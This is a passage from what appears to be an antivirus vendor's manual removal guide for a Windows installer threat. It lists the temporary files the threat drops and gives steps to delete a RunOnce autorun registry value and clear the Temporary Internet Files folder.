    %Documents and Settings%\%current user%\Local Settings\Temp\nsaF.tmp (11755 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\10SAOYKV\zEuCD[1] (36408 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsg12.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsf11.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa22.tmp (5952 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst19.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsl23.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QVGR0V8V\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (30 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y76DQBOB\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi8.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi9.tmp\inetc.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nseC.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd7.tmp (6720 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nseB.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nskD.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsoA.tmp (7192 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
    "Finalize" = "%Documents and Settings%\%current user%\Application Data\InstallW\Full_Setup.exe /runonce"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
